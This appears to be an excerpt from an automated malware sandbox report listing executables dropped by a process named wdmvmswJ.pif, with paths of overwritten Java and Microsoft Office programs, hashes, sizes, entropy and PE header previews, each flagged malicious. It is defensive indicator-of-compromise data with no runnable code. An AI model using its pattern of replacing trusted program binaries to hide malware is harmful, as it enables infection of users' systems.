                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032998484090307
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:GilVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:v7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:92C532B7D4BBD38F3015EF968462D160
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8B823788B63013089814DDCB3A44339941E08AFE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5932DA35151E821BB6981924FB2964239F3D5DAC18E0D513A6174E488599BDA7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DB8F566441830CDFB25D51F5DD60C381197B66BF73E280B08B09F50651E0D35775EB5F7D9166B0FC2DC9F9E86E54F990A49986ED92C5DAF2BA1427D708268932
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................@(.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032972322082015
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:2Tm1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:AosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:93206A9817BD4D5BDBC795F0FACD3AAA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:52E5095BF44A63386E5C75C82D4CCF53A5896B94
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:FBFB572D9ABE7674FED31EEF2E48960C30E5714E798AEC1AA25747CFC669B0DD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:B4AAB4177FDE536C9919DFC7094963BA2B68B6B9F6EB013025EF4062C2F3B8547F64DF365233BBDE1712C54DF4086A58E37AF53F6A4A3E4402BD4F7B08F97A7F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................H.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0338837725707215
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:8ampXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7EsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:2F2F64B50FE76352F39063F7F2D9D4CC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4914CA0F381175E5EA97F43EDCA1E55502E74EE0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:05B9AE1B4F6FD35BB38844949A6114E2AC35B97C9B8F30A90F218969A925EBFD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ACDF35A2D43D0D9A4B96AA8B1F0C545078013AB57DB7D24C06A63F5CF8E773B765A2616D21848E762EB527C0E562436854492508C0622A2DE3EC471E1C90E8BF
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................=)......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032953073004555
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:AQ5dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:P/sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:EFE94441A1466A2F3A56C6C44D1CF738
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8414ED642A55858EB7BE6F00389E795A4BD088D9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4A2441ACBE2DD2C2BAD6F08927626A34E11CC328F1D3D2665FEEE78ABF45DFD8
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:F8B86B09F8B4F0E5E03BA712044A97C6032D97D33735708EF7A7F74E0D1571CD0A1A8D2AF09184D6A3050D14A0C4F2C26BA10B682FD76C05A36FE8E9D102C081
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................UY.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032986680875905
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:JV/VXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rtsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:7627CD899516C3D6C681DF0513CDA82E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3F4F77A11451AB2C70D8AF366980B26396635EE4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A67A3B30F9EE80E4C5055AC41A8806E882DC52FDBEA2DCFD95F0B07332D51F26
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C4BB5C8D6035EADF98173BEC29480C23E47B6A1EFBBC7F4CA84F7DA1D3A9D012ACCCBCEAB771840D8CE92733B9FB8D0C644A6253B2C08BC80FC0699468D4DDC4
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................f.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032870777136916
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:NZmPXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:L2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:018C0055DEB285057B253A5771624396
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E29430DC17C4B9B4FD1AE79BE8ED6940F319F531
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D9E7D9906B649C3E2DD90EB833342E3A39BCF74227E832D97E1C0E1B898CB19C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ECA15C9D5A82F87E91A7231A3AC21386F5B64E3BE831DE3E9F3453ABFB9B094AA273A06A47277CDB1610485B2AFB26FB9FB1B72C2E4BC9FB849ED82AC8FD7129
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032923487801805
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:HeSXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:+qsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:886FCC9F3B1A34BAC5BD1633064BD9A0
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4A23E3EBF1643342A8621C421838DC2456BAE68E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2310942D56CDDA986C0AF2FAFBD9996BD4562E8279E53C3B82B470FB2C5EB6A7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E38CE79E00E9D2E5BBF792314E046C567BD64363E99EFC9A43BA44804F647922EE26F783EEDA901CE9E0C05EE86686F29E2A70F14874CAC66322722361266DD8
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................n.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032985304598125
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:/5/fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:hnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1B875B4754D23EA90A3163FA9DEAAC0C
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:8444F7D6ABD1EC2C83B0B6BA018B5647C05AE6FF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:793E0B236D7F0F16CFC84B331B2C4D6B56A6035137AEEAF26D707081F4AC34C3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:62E5661780346413BE7541728FF3FED86D5817C07DE03AA0D673EACBC9D90325ECC0C2682F6428AAB69BA5FCDA623EAE6459617A9BE0A2B74873780E01E514AC
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1206784
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0843040995084525
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:mcpXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:mcpsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:998746B1B7904346A8174FEF4B911F22
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:84872AE74FE6186EA4223399754A43744261DE7B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:54D41C807A7366BA98340AE13E7F49F89387B14CE9B778E0C4D9CE687F95EBB3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:BA3797153E49CE5C148354F1F0257A1A8D0393C19FAEEDD1B75C5B9AA6A709A4D24A0BD5589F91765B8E05A9AD0A2884AF0E0928D2C316E954FB162A1A0DFAC0
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.................................G=..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@...P..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1142784
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.032320530190986
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:wKQzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:V8sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:10DE76A417D4E0C3BE18B15F66A924BB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9F8EABCB95A3EDD1C53C2EEF52B3F4D428F0C050
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5DCA17058DD118049D7BD27B6128D56D8F82C5B1E5241B56EFDC79B10672F59D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:CEBE69D75F601D74819D13F4BE699BD243304A18DE9CE12E7EA5F477F6D5219CB2B0009DF9CCD9DBEE2380ABD4C32ECD3B63506C67803919D520EB697D8DCDDD
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................._.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1303040
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.236138324097892
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:fi7lP3roAVsqjnhMgeiCl7G0nehbGZpbD:ClvroAJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:56D85FCA3A13BCC4F5D54A0D7FDF6FD3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B906D45DA73056FA97B7D1EE82276A898E76C4DF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F947D1E64C5B17F1A131577B360957B8B6BD1ED5D02F0ED6467E1454B9F0149
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:94DEF4C1B5EB2AA074607EBA21FC0627B0BEC1C7BEE5A85DFFE562FDC7D3FC54BBE6B5654504A4853491DFCF904E7E81D494A90B074FE4C6A05B929811222372
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`.......P..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1273344
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2735040065872445
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:P5bfQXxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PNfQXxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:53461E698EBB3C9415264F3BCC7EDA2F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:29290DA3B6993DBF8A1F504922F712E604C1F279
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A99BC5A9F9C1C3D2B7D0E3DED7145FE644FA0A9F5A11A9E2C4705F93C8B16014
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1B31B2BA659553C40F9CA4DA8A8C1A425E44E4286B8DA2485162D97315EA124A352BAB9E3A2AD9313F92F4C25DAD5319F4156ED13C76BD0570FBF41746B46317
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@...`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1291776
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.290140755736029
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:lNmt0LDILi2liXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:wLi9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:F650CE9C51B5B94DAF4B2088B79A8D86
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3FC91982B084F0E6093B64834DEA13138CE5CA20
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:09B73E33F1BD8570EBCBBAC326E0ADCAF2100B18D6102EE97C2C1526FA2ED086
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FAD9B69534B8629A04C9560CFF2F13D755EA33C886466713ADD6090855F7BD52F9E1602C38A1A631DBAB7C68DF43E3EF0D11C3073272D56D890FB84DD649B054
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................e............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p...p...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1291776
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.290140171080609
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:ZNmt0LDILi2liXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:8Li9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:9DFCEB63BD567986BCD366E3DF6507CB
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E3C42180CAF3C80C83D1DF9B3597CF13A33F37D9
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C2860FCE87657BF782F122CBB218C0216AE54790DB66A4D2A6899B90CA7FBF48
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EF2AA355E4B9DE9656F51B39D6FF3989D417328ED05A95CB8EDDCB18778941BF2453A754BA7C16958B45DC104160AA9A24ADA083394C50E447D0BA7C84DDA976
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
